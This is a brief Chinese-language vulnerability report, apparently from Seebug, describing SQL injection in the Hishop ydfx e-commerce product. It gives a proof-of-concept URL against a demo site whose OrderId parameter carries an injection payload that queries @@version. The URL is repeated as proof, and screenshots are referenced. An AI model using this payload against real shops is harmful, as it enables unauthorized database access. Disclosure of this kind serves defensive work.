### 简要描述:
hishop最新版存在SQL注入(demo演示)
### 详细说明:
hishop最新版存在SQL注入(demo演示)
http://www.hishop.com.cn/products/ydfx/
[<img src="https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/251908128f3b569987249868b7d81fd8de4dd084.jpg)
这里是demo:
随意注册一个,登录,访问POC:
```
http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271
```
### 漏洞证明:
```
http://ydfx.demo.shopefx.com/user/UserRefundApply.aspx?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271
```
[<img src="https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/25190902dff776ed8989665b72956360bdd5bef8.jpg)
京公网安备 11010502034610号
暂无评论